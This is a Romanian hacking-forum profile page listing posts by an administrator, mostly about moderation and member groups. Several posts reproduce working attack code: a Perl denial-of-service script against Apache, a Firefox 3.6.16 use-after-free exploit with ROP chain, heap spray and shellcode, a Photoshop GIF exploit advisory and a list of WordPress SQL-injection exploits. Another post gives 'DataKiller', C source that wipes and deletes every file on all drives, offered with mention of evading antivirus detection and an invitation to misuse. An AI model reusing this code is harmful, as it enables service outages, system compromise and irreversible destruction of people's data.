Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18785

  • Joined

  • Last visited

  • Days Won

    738

 Content Type 

Everything posted by Nytro

  1. Nytro
    Si mai bine: http://rstcenter.com/forum/39386-powergrep-4-a.rst
  2. Nytro

    PowerGREP 4

    Nytro posted a topic in Programe utile

    PowerGREP is a powerful Windows grep tool. Quickly search through large numbers of files on your PC or network, including text and binary files, compressed archives, MS Word documents, Excel spreadsheets, PDF files, OpenOffice files, etc. Find the information you want with powerful text patterns (regular expressions) specifying the form of what you want, instead of literal text. Search and replace with one or many regular expressions to comprehensively maintain web sites, source code, reports, etc. Extract statistics and knowledge from logs files and large data sets. Foarte util pentru cautarea in fisiere pe baza de expresii regulate, nu e deloc greu de folosit si are o tona de optiuni. Nu stiu daca e infectat, eu il folosesc si nu am avut probleme. Screenshot de pe site-ul oficial: http://www.powergrep.com/screens/powergrep.png E portabil, nu trebuie instalat. Download: http://www.multiupload.com/Q5VT2RWE8Y
  3. Nytro
    Adobe Photoshop CS5 GIF Remote Code Execution ##################################################################################### Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 (12.0 and 12.1) Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 {PRL}: 2011-08 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Timeline 3) Technical details 4) PoC ##################################################################################### =============== 1) Introduction =============== Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.[3]. Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition. http://en.wikipedia.org/wiki/Adobe_Photoshop ##################################################################################### ============================ 2) Timeline ============================ 2011-06-14 - Vulnerability reported to vendor 2011-09-09 - Coordinated public release of advisory ##################################################################################### ============================ 3) Technical details ============================ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe PhotoShop CS5. User interaction is required to exploit this vulnerability in that the target must open a malicious GIF file. When the "ushort ImageHeight" is crafted with an invalid value the memory is corrupted and arbitrary code can be run on the remote host. ##################################################################################### =========== 4) The Code =========== http://www.protekresearchlab.com/exploits/PRL-2011-08.gif http://exploit-db.com/sploits/17712.zip Sursa: Adobe Photoshop CS5 GIF Remote Code Execution Cand ajung acasa il testez si eu, parca aveam Photoshop CS5...
  4. Nytro

    Limbaj neadecvat

    Nytro replied to gigaevil's topic in Sugestii

    Atacurile la persoana, injuraturile... se pedepsesc. Daca nu vad eu (ceea ce e foarte posibil, nu am timp sa citesc toate posturile) imi puteti trimite PM si se rezolva.
  5. Nytro

    Limbaj neadecvat

    Nytro replied to gigaevil's topic in Sugestii

    Vreau link-uri... Pe mine nu ma deranjeaza un "plm" aruncat acolo, nu cred ca e problema. Daca sunt injuraturi da, se primeste avertisment. Bine, la offtopic nu ma complic sa dau avertismente, nu sunt foarte interesat de acea categorie. Vreau sa vad exemple de posturi cu limbaj inadecvat.
  6. Nytro
    Noi membri ai grupurilor: - Xander - PHP Coder - silvian0 - PHP Coder - Gecko - Designer - denjacker - Web Vulnerability Master - Lider Cred ca 2 sunt pe lista de asteptare, ramane de vazut zilele astea daca vor fi sau nu recrutati.
  7. Nytro
    Offtopic, nu stricati topicul.
  8. Nytro
    Update: DataKiller v0.2 Ce e nou: - Safe file delete Vedeti primul post pentru mai multe informatii.
  9. Nytro
    Semnaturi nu stiu daca are rost, dar daca cineva are nevoie de grafica, de imagini sau altceva pentru un proiect, cred ca Designerii vor fi bucurosi sa ajute.
  10. Nytro

    geoRAT 3.0

    Nytro replied to gigaevil's topic in Programare

    Si uite asa avem un nou VIP.
  11. Nytro
    Apache httpd Remote Denial of Service (memory exhaustion) #Apache httpd Remote Denial of Service (memory exhaustion) #By Kingcope #Year 2011 # # Will result in swapping memory to filesystem on the remote side # plus killing of processes when running out of swap space. # Remote System becomes unstable. # use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); } Pare promitator... Sursa: Apache httpd Remote Denial of Service (memory exhaustion)
  12. Nytro
    Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube
  13. Nytro
    La optiunea de excludere a partitiei cu Windows m-am gandit. Dar pot fi si alte fisiere pe acolo. Cred ca voi pune optiune de ocolire ?:/Windows si ?:/Program Files, ca in Documents And Settings se mai afla date, la fel si /Users pe Windows 7. Dar cred ca ma complic degeaba. O sa ma mai gandesc si cand mai am timp liber mai lucrez la el.
  14. Nytro
    Cine vrea sa fie recrutat in acel grup, add la "grupuri_rst" si discutam. Si vedem si cat intelege din ceea ce face.
  15. Nytro
    Nu "o sa faca furori", doar ca va fi mai complex si mai util. Astept idei si sugestii, cat despre implementare, vor putea sa contribuie cei din grupul C/C++ coder.
  16. Nytro
    Nu, VIP e altceva.
  17. Nytro
    Da, sunt sigur ca daca vad "[G] Java Programmer" in loc de "Java Prgrammers", chiar daca e prima oara cand intra pe RST vor zice: "Aaaa, da ma, acum stiu, e cu grupurile alea de care nu stiu, dar "G" vine de la grupuri si m-a lamurit". Nu are rost, poate o sa pun un Italic, un stil aparte la ele, deocamdata nu e necesar.
  18. Nytro
    "Registered user" != "Java Programmer" != "VIP" Si daca pui un copil care nu stie sa citeasca sa se uite, o sa isi dea seama ca nu e acelasi lucru. PS: Cei cu rangul de VIP au acum statusul grupului (Linux...), dar si permisiunile de VIP.
  19. Nytro
    Nume: DataKiller Descriere: Sterge toate fisierele Autor: Grupul C/C++ Coder @ Romanian Security Team Marime: 8.5 KB Atentie! Nu rulati acest executabil, va incerca sa stearga toate fisierele! O descriere mai amanantita: acum ceva timp, mi-a cerut cineva un astfel de program si mi s-a parut o idee interesanta. Este a doua versiune, am de gand sa ii pun cateva optiuni utile (sa stearga doar pozele de exemplu). Ce e nou: - Safe File Delete Nu e nimic complicat, dar poate fi foarte util. Singurul lucru pe care il face e sa inlocuiasca toate datele din fisierele care urmeaza sa fie sterge cu NULL. Astfel, un fisier ce contine "aaa", va contine "NULL,NULL,NULL" apoi va fi sters. In caz ca nu stiati, cand dati Delete la un fisier, datele din fisier nu sunt sterse, ci e stearsa doar legatura catre acel fisier, dar datele raman pe hard disk si pot fi recuperate partial sau total. Cu aceasta optiune, nu vor mai putea fi recuperate, insa executia programului va fi MULT mai lunga si va consuma mai multe resurse. Va dura peste 30 de minute, depinde de marimea si nr. fisierelor de pe calculator. Eu estimez ca ar dura cam 1-2 ore o executie. Si oricum am cateva idei de viitor. E singura optiune implementata, dar dupa cum se vede in sursa mai am cateva idei de pus in aplicare. Codul sursa nu are rost sa il ascund, problema ar fi faptul ca nu e extraodrinar scris, nu m-am straduit sa fac optimizari. DataKiller.c /* Name: DataKiller.c Description: Delete all deleteable files Authors: Grupul C/C++ Coder @ Romanian Security Team Info: Nu toate optiunile au fost implementate */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> /* Setari definite de utilizator - puteti sa modificati valorile */ int safe_file_delete = 1; /* "-[n]sf" Sterge fisierul fara sa poata fi recuperat */ int safe_delete_file_info = 0; /* "-[n]si" Sterge si informatiile despre fisier */ int delete_all_files = 1; /* "-[n]da" Sterge toate fisierele */ int delete_all_images = 1; /* "-[n]di" Sterge toate imaginile */ int delete_all_media = 1; /* "-[n]dm" Sterge toate melodiile, videoclipurile */ int delete_all_documents = 1; /* "-[n]dd" Sterge toate documentele */ int exclude_windows_partition = 0; /* "-[n]ew" Nu sterge nimic de pe partita cu Windows-ul */ /* Marimi buffere */ #define VOLNAME_SIZE 4 #define VOLBUFFER_SIZE 1337 #define DIRBUFFER_SIZE 255 #define FILENAME_SIZE 31337 /* Contoare pentru nr. de fisiere si de foldere - statistici */ int nr_files = 0; int nr_directories = 0; int deleted_files = 0; int deleted_directories = 0; /* Functia inlocuieste datele dintr-un fisier cu 0 (NULL) */ void NullFile(const char *fisier) { HANDLE hFisier = NULL; DWORD file_size = 0; DWORD file_size_2 = 0, written = 0; unsigned char *buf = NULL; SetFileAttributes(fisier, FILE_ATTRIBUTE_NORMAL); hFisier = CreateFile(fisier, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL); if(hFisier != INVALID_HANDLE_VALUE) { file_size = GetFileSize(hFisier, &file_size_2); /* NULL-uim fisierul, ca sa nu poata fi recuperate datele */ buf = (unsigned char *)malloc(file_size); memset(buf, 0, file_size); WriteFile(hFisier, buf, file_size, &written, NULL); free(buf); CloseHandle(hFisier); } } /* Functie recursiva, sterge folderele si fisierele */ void DeleteFiles(char *directory) { WIN32_FIND_DATA file_data; HANDLE hFisier; int new_file = 1; char dir_buffer[DIRBUFFER_SIZE] = {0}; char file_name[FILENAME_SIZE] = {0}; char new_dir[DIRBUFFER_SIZE] = {0}; /* Formam sirul de caractere pentru FindFirstFile */ memset(&file_data, 0, sizeof(WIN32_FIND_DATA)); sprintf(dir_buffer, "%s*", directory); hFisier = FindFirstFile(dir_buffer, &file_data); /* Parcurgem folderul */ while(hFisier != INVALID_HANDLE_VALUE && new_file) { sprintf(file_name, "%s%s", directory, file_data.cFileName); /* Daca e folder */ if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) && (GetFileAttributes(file_name) != (unsigned)-1)) { sprintf(new_dir, "%s\\", file_name); /* Evitam "." si ".." */ if(file_name[strlen(file_name) - 1] != '.') { nr_directories++; DeleteFiles(new_dir); if(RemoveDirectory(new_dir)) deleted_directories++; } } /* Daca e fisier */ else { nr_files++; if(safe_file_delete) NullFile(file_name); if(DeleteFile(file_name)) deleted_files++; } /* Trecem la urmatorul fisier/folder */ new_file = FindNextFile(hFisier, &file_data); } FindClose(hFisier); } int main(int argc, char *argv[]) { char *dir_buffer = NULL; char **drives = NULL; int dir_buf_size = 0, nr_drives = 0, i = 0, a = 0; /* Verificam parametrii din linia de comanda */ if(argc > 1) { for(a = 1; a < argc; a++) { /* Luam fiecare parametru in parte */ if(strcmp(argv[a], "-sf") == 0) safe_file_delete = 1; else if(strcmp(argv[a], "-nsf") == 0) safe_file_delete = 0; else if(strcmp(argv[a], "-si") == 0) safe_delete_file_info = 1; else if(strcmp(argv[a], "-nsi") == 0) safe_delete_file_info = 0; else if(strcmp(argv[a], "-da") == 0) delete_all_files = 1; else if(strcmp(argv[a], "-nda") == 0) delete_all_files = 0; else if(strcmp(argv[a], "-di") == 0) delete_all_images = 1; else if(strcmp(argv[a], "-ndi") == 0) delete_all_images = 0; else if(strcmp(argv[a], "-dm") == 0) delete_all_media = 1; else if(strcmp(argv[a], "-ndm") == 0) delete_all_media = 0; else if(strcmp(argv[a], "-dd") == 0) delete_all_documents = 1; else if(strcmp(argv[a], "-ndd") == 0) delete_all_documents = 0; else if(strcmp(argv[a], "-ew") == 0) exclude_windows_partition = 1; else if(strcmp(argv[a], "-new") == 0) exclude_windows_partition = 0; } } /* Alocam memorie */ dir_buffer = (char *)malloc(VOLBUFFER_SIZE); dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer); nr_drives = dir_buf_size / VOLNAME_SIZE; drives = (char **)malloc(sizeof(char *) * nr_drives); /* Parcurgem volumele */ for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++) { drives[i] = (char *)malloc(VOLNAME_SIZE); strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE); printf("Drive: %s: %d\n", drives[i], GetDriveType(drives[i])); if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE) DeleteFiles(drives[i]); } printf("Foldere: %d\nFisiere: %d\n", nr_directories, nr_files); printf("Foldere sterse: %d\nFisiere sterse: %d\n", deleted_directories, deleted_files); /* Eliberam memoria */ for(i = 0; i < nr_drives; i++) free(drives[i]); free(drives); free(dir_buffer); return 0; } Pastebin: [C] DataKiller.c - Pastebin.com Daca vreti sa il compilati, compilati-l cu optiunea "-mwindows" pentru linker, astfel incat sa nu se deschida CMD-ul cand va fi rulat. Eu l-am compilat si cu optimizari pentru marime "-s" si "-Os". Utilizare? Cred ca o sa ii gasiti voi una, cred ca vor fi destui care il vor gasi "util". Partea nasoala, din cate observ, e ca e detectabil... http://www.virustotal.com/file-scan/report.html?id=b0d3d314fa0de3e4041e16525017a7960641a089cd7bf5a887ccb9ec53d935df-1313949171 O sa lucrez si la acest aspect. Ideea e ca il puteti compila din sursa, sa nu credeti ca am postat altceva. Download: http://www.girlshare.ro/2529741.5 http://www.speedyshare.com/files/29969756/DataKiller.exe http://www.megaupload.com/?d=S88LSQH1 http://www.mediafire.com/?ti4gvi9nnj7g91q http://www.multiupload.com/DOTY3PVTX3 Stiu, e banal, stupid si non-etic, eu nu am nevoie de asa ceva dar unii poate au nevoie. Fiti rai!
  20. Nytro
    Keyscrambler?
  21. Nytro
    Noi membri ai grupurilor: - sql.breaker - PHP - Usr6 - Malware analyzer - Gabriel87 - Designer - gigaevil - C++ Coder Modificare temporara: grupul Web Designer face parte din grupul Designer. Lista de pana acum cu toti: PHP Coder - Synthesis - Lider - GarryOne - Membru - sql.breaker - Membru Java Programmer - M2G - Lider - em - Membru Linux Administrator - Zatarra - Lider - BGS - Membru - Spock - Membru - adonisslanic - Membru VB6 Programmer - Wav3 - Lider Malware analyzer - Paul4Games - Usr6 Windows Administrator - wildchild - Lider Pyhon Coder - cmin - Lider - python3 - Membru Designer - Surge - Lider - robertutzu - Gabriel87 .NET Programmer - Alien - Lider C/C++ Programmer - Nytro - Lider - Pantrunjel - Membru - gigaevil - Membru Toti liderii sunt rugati sa ma contacteze sa discutam, legate de proiecte si de planuri de viitor.
  22. Nytro
    Eu am incercat pe Windows 7 dar Mozilla 3.6.15 si a crash-uit fara sa execute shellcode-ul.
  23. Nytro
    Wordpress plugins exploits Author: Exploits by Miroslav Stampar &laquo Exploit Database Lista: WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability Sursa: Exploits by Miroslav Stampar &laquo Exploit Database
  24. Nytro
    Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) <html> <body> <applet code="rubik.class" width=140 height=140></applet> <p><b>Mozilla mChannel Object use after free</b><br /> - Found by regenrecht<br /> - MSF exploit by Rh0<br /> - Win 7 fun version by mr_me</p> <!-- Notes: - This exploit requires <= java 6 update 25. - optimized heap spray and still works on mutiple tabs as the spray is large enough to hit the 0x10000000 block. - If you really want the class file you can get it here: http://javaboutique.internet.com/Rubik/rubik.class, but java still loads without it. - Tested on windows 7 ultimate (latest updates). - http://bit.ly/qD4Jkc --> <object id="d"><object> <script type="text/javascript"> function trigger(){ alert('ready?'); fakeobject = document.getElementById("d"); // allocate the object fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions fakeobject.onChannelRedirect(null,new Object,0); // free it /* fill the object with a fake vtable reference just use the start of a block for simplicity and use \x00 because it expands to a NULL so that when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000 */ fakevtable = unescape("\x00%u1000"); var rop = ""; // 3 instructions to pivot cleanly rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll> rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll> rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll> // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect() rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler) rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler) rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret ' rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx) rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi) rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax) rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN sc = rop; // nice big 'calccode' (0x400 bytes) sc += unescape("%uf869%u0d93%u3578%u7704%u902d%u432c%u249f%uba46%u983c%ub299%ufe13%uf9c0"+ "%u784f%u2f7c%u4fa9%u7a76%ub235%u7027%u2f73%ub937%ud380%u0de3%u157f%u93b5%ubfba%u4291"+ "%ufc03%u3d40%u729f%u9b24%u7e7b%u3814%u8dfd%u2592%u892c%u01e0%uf9d0%u41b1%uf731%u75e1"+ "%ubb3f%u7d79%uf811%u6734%u992d%u4b49%u6690%u71b4%ua847%u094a%u05eb%u4eb3%ud119%u3ae2"+ "%u0cd6%u96be%ub0b8%u4697%u98b7%u1048%ub6d5%u1c04%uf56b%u201d%u74d4%u773c%u727f%u7b7d"+ "%u7e7c%u7571%u9743%u1c49%ubb90%u4e74%u3cb5%ua993%ub09f%u73ba%ud522%u8d4f%u98be%u3304"+ "%u88f5%u43d4%u92b4%u7ab8%ud60a%u1da8%ub14a%uf82a%ub7b2%u2c41%u3b79%u05fd%u85b9%u76e0"+ "%ufc1a%u4b35%u9647%u8134%u24e1%u8366%u48e3%u4214%u870c%uebd2%u3f78%u9bb3%uff1b%uc1c7"+ "%u67e2%u910d%u70b6%u4615%u2d25%u772f%u993d%ubf27%u1240%u37f9%u7a77%u7279%u9167%u2f76"+ "%ubeb5%u15b6%u7d7f%u303f%u40e3%u11b7%u19e0%u39e2%u04fc%ua8ba%u991d%ud518%u41bb%u78bf"+ "%u9834%ub8b4%u270d%u8390%u4ffd%u31b1%u70e1%u4349%u86b3%u9ff5%u331c%ud6f7%u667e%ua93c"+ "%u9b8d%uf687%u46d4%u4293%u7314%u3d35%u257b%u4a97%u37b0%u2496%u4b74%u2c75%u92b9%u2d7c"+ "%u4748%u694e%uebd3%uf829%u08b2%u71f9%u790c%u717a%u227b%u05e2%u3cb8%u9fb6%u7896%uf903"+ "%u217e%ubfd6%u4e91%u3db3%u777c%u0d76%u7372%u1541%ub2ba%u342c%u9048%ud484%ue189%u4f05"+ "%u677f%ubbb9%u4370%u7d74%u1c75%ua92d%u1342%u93f5%u090c%u12e3%u92f8%u662f%u49b0%u8d99"+ "%ub44b%uc688%uebc0%u474a%u2b37%u46fc%u0a9b%u04fd%ue086%u2740%ua8be%u35b5%u3f97%u24b1"+ "%u1498%u25b7%u7c1d%u0b7f%ub1d5%u410c%u1047%u7deb%ue228%u7672%u7e78%u7177%u1b73%ufdd0"+ "%u3bb2%u3ce0%u7515%u4e25%uf52a%u70b9%u3540%u9993%ubf2c%u85b5%u79fc%u3474%u377b%ud26b"+ "%ubed5%u982d%ue33a%u9243%u7a14%ub33d%u9048%ubb8d%u9b24%u2f46%u20b0%uf9d1%ub897%ua866"+ "%ub4b7%ua996%ub642%ue180%u4a27%u1a77%u9fd4%u017e%u18eb%u8cf8%ubad6%u1c7c%u497f%u7467"+ "%u784f%u914b%u3271%u04e0%u0d7a%u1d79%u397b%ue2c1%u7d05%u933f%u70b1%ub324%u3cb8%u6642"+ "%u961c%u9b27%u72bf%ue338%ub53d%u3040%ub4fc%u7646%uf525%u029f%ubad5%u0cf8%u3fa9%u7514"+ "%ubb0d%u23e1%ub9d6%u05d4%u378d%ub243%ub735%u1573%u4798%u2c48%ua84b%ufd41%u4f2d%u1db6"+ "%u9049%uf981%ube04%u3491%u924e%ub097%u2f4a%u9967%u8dbe%u5994%udbe7%ud9da%u2474%u58f4"+ "%uc929%u33b1%u7031%u8312%u04c0%ufd03%ubb9a%u0112%ub24a%uf9dd%ua58b%u1c54%uf7ba%u5503"+ "%uc7ef%u3b40%ua31c%uaf05%uc197%uc081%u6f10%ueff4%u41a1%ua338%uc362%ub9c4%u23b6%u72f4"+ "%u22cb%u6e31%u7624%ue5ea%u6797%ubb9f%u892b%ub04f%uf114%u06ea%u4be0%u56f4%uc759%u4ebe"+ "%u8fd1%u6f1e%ucc36%u2663%u2733%ub917%u7995%u88d8%ud6d9%u25e7%u27d4%u812f%u5207%uf25b"+ "%u65ba%u8998%ue360%u293d%u53e2%uc8e6%u0527%uc66d%u418c%uca29%u8513%uf641%u2898%u7f86"+ "%u0eda%u2402%u2fb8%u8013%u4f6f%u6c43%uf5cf%u9e0f%u8f04%uf44d%u1ddb%ub1e8%u1ddc%u91f3"+ "%u2cb4%u7e78%ub0c2%u3bab%ufb3c%u6df6%ua2d5%u2c62%u54b8%u7259%ud6c5%u0a68%uc632%u0f18"+ "%u407e%u7df0%u25ef%ud2f6%u6c10%ub595%uec82%u5074%u9623%u4188"); // create a string with a ptr to the offset of our rop // used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget) var filler = unescape("%u001c%u1000"); while(filler.length < 0x100) {filler += filler;} /* create a string with 0x18 bytes at the start containing ptr's to the rop. This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]' Then fill with sc + junk */ var chunk = filler.substring(0,0x18/2); chunk += sc; chunk += filler; // create a string of size 64k in memory that contains sc + filler var heapblock = chunk.substring(0,0x10000/2); // keep adding more memory that contains sc + filler to reach 512kB while (heapblock.length<0x80000) {heapblock += heapblock;} /* using a final string of 512kB so that the spray is fast but ensuring accuracy - sub the block header length (0x24) - sub 1/4 of a page for sc (0x400) - sub the string length (0x04) - sub the null byte terminator */ var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2); // optimised spray, precision can still be reliable even with tabs. // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed. arrayOfHeapBlocks = new Array() for (n=0;n<0x80;n++){ arrayOfHeapBlocks[n] = finalspray + sc; } } trigger(); </script> </body> </html> Are cineva o versiune mai veche de Mozilla sa il testeze? Daca nu uit il testez eu cand ajung acasa, cred ca sunt destui care au versiuni vechi de Mozilla. Sursa: Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
  25. Nytro
    Depinde de fiecare, eu unu m-as multumi cu asa ceva, eu am nevoie de maxim 1 GB RAM, un procesor de 2.5 GHz si o placa video de 2 lei. Dar eu nu ma joc, decat din an in Paste un Counter-Strike. Daca nu esti gamer si nu vrei cine stie ce de la un calculator, cum eu de exemplu nu vreau, e bun.
×
×
  • Create New...